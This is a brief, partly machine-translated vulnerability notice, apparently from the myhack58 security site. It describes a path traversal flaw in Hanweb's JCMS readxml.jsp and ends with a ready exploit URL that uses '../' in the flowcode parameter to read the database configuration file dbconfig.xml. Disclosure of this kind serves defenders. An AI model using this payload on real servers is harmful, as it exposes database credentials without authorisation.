Han Edition through JCMS database configuration file read vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201442023
Type myhack58
Reporter 佚名
Modified 2014-01-25T00:00:00


Due to read the xml file when not to pass into the parameters for the filter, the flowcode parameters can be controlled, 配置文件地址WEB-INF/config/dbconfig.xml due to the control of the file suffix, can only read the xml file

EXP:http://www. iswin. org/jcms/workflow/design/readxml. jsp? flowcode=../../../WEB-INF/config/dbconfig